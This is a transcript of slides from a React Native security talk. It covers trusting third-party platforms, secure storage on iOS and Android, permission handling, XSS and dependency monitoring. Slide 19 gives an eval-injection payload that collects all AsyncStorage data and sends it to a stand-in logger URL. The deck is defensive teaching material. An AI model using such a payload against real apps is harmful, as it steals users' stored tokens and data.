$30 off During Our Annual Pro Sale. View Details »

React Native Security

Julia Mezher
December 05, 2020

React Native Security

Julia Mezher

December 05, 2020
Tweet

More Decks by Julia Mezher

Other Decks in Technology

Transcript

  1. React Native Security
    Addressing Typical Mistakes
    JULIA POTAPENKO

    View Slide

  2. About me
    Security Software
    Engineer at Cossack Labs
    We help companies to protect their
    sensitive and valuable data.
    @julepka

    View Slide

  3. We will talk about
    Architecture
    Platforms usage
    Dependencies

    View Slide

  4. “Choosing React Native and its components
    means that you understand and accept
    potential security consequences.”

    View Slide

  5. Architecture basics
    React Native is a cross-platform solution from Facebook
    that allows writing native apps using React (JavaScript or
    TypeScript).

    View Slide

  6. Trusting third parties
    Apple and Google are must haves.
    Add Facebook to the list.

    View Slide

  7. Trusting third parties
    Apple and Google are must haves.
    Add Facebook to the list.

    View Slide

  8. Trusting third parties
    Apple and Google are must haves.
    Add Facebook to the list.
    CVE-2020-1911

    CVE-2020-1912

    CVE-2020-1913

    View Slide

  9. “Working with React Native developers
    deal with security for all three platforms:
    iOS, Android and React Native.”

    View Slide

  10. OWASP Mobile
    Top 10
    #1
    Improper platform
    usage

    View Slide

  11. React Native is a leaky abstraction
    @vixentael

    View Slide

  12. Secure Store Example
    iOS Android
    Keychain
    SharedPreferences +
    KeyStore
    Data stored encrypted Yes Yes

    View Slide

  13. Secure Store Example
    iOS Android
    Keychain
    SharedPreferences +
    KeyStore
    Data stored encrypted Yes Yes
    Data persists across
    app reinstalls
    Yes No
    Hardware-backed
    encryption
    Yes
    Depends on device
    vendor
    Data decrypted only
    before usage
    Decrypted when
    device unlocked
    Yes

    View Slide

  14. Managing Android Permissions
    Android: You can add permissions in multiple files

    View Slide

  15. Managing Android Permissions
    Android: You can add permissions in multiple files
    +
    React Navite: It is common practice to use third-party
    solutions

    View Slide

  16. Managing Android Permissions
    Android: You can add permissions in multiple files
    +
    React Navite: It is common practice to use third-party
    solutions
    =

    View Slide

  17. Managing Android Permissions
    Android: You can add permissions in multiple files
    +
    React Native: It is common practice to use third-party
    solutions
    =

    I don’t need this permission
    The app crashes if I delete it

    View Slide

  18. Is XSS possible?
    XSS possibility is decreases by design.

    View Slide

  19. Is XSS possible?
    XSS possibility is decreases by design.
    XSS is still possible.
    eval()
    _reactNative.AsyncStorage.getAllKeys(function(err,result)
    {_reactNative.AsyncStorage.multiGet(result,function(err,result)
    {fetch(‘http://example.com/logger.php?token='+JSON.stringify(result));});});
    Steal all the data from local storage (AsyncStorage) by exploiting
    eval-based injection and accessing React Native APIs

    View Slide

  20. Apart from Source Code
    Annual BIS Reports
    US encryption export regulations
    Apple privacy rules
    User acknowledgement about private data usage

    View Slide

  21. “50 shades of dependencies”

    View Slide

  22. A typical day for React Native app developer

    View Slide

  23. A typical day for React Native app developer
    (It is joke )

    View Slide

  24. Monitoring dependencies

    View Slide

  25. Monitoring dependencies

    So many dependencies
    Additional CI work
    Integrating dependency checkers

    View Slide

  26. Monitoring dependencies

    So many dependencies
    Additional CI work
    One update triggers another update
    Integrating dependency checkers
    Updates may be incompatible
    What if there is no fix for vulnerability?

    View Slide

  27. ✅ Learn more about the issue, its scope
    ✅ Document it, make the team aware
    ✅ Monitor it and book the time for the update
    What if there is no fix?

    View Slide

  28. ✅ Learn more about the issue, its scope
    ✅ Document it, make the team aware
    ✅ Monitor it and book the time for the update
    What if there is no fix?
    React Native requires team to plan time more carefully

    View Slide

  29. React Native requires team to plan time more carefully
    ➡ iOS or Android update
    ➡ React Native update
    ➡ Forked version update
    ➡ Dependencies update
    ➡ Mobile app source code update

    View Slide

  30. Final Thoughts
    “Learn once, write anywhere.”
    “Learn once, ask mobile security
    people for help.”

    View Slide

  31. Where to go next
    My React Native Security Article
    https://www.cossacklabs.com/blog/react-native-app-security.html
    React Native Security Guide
    https://reactnative.dev/docs/security

    View Slide

  32. Thank You!
    @julepka

    View Slide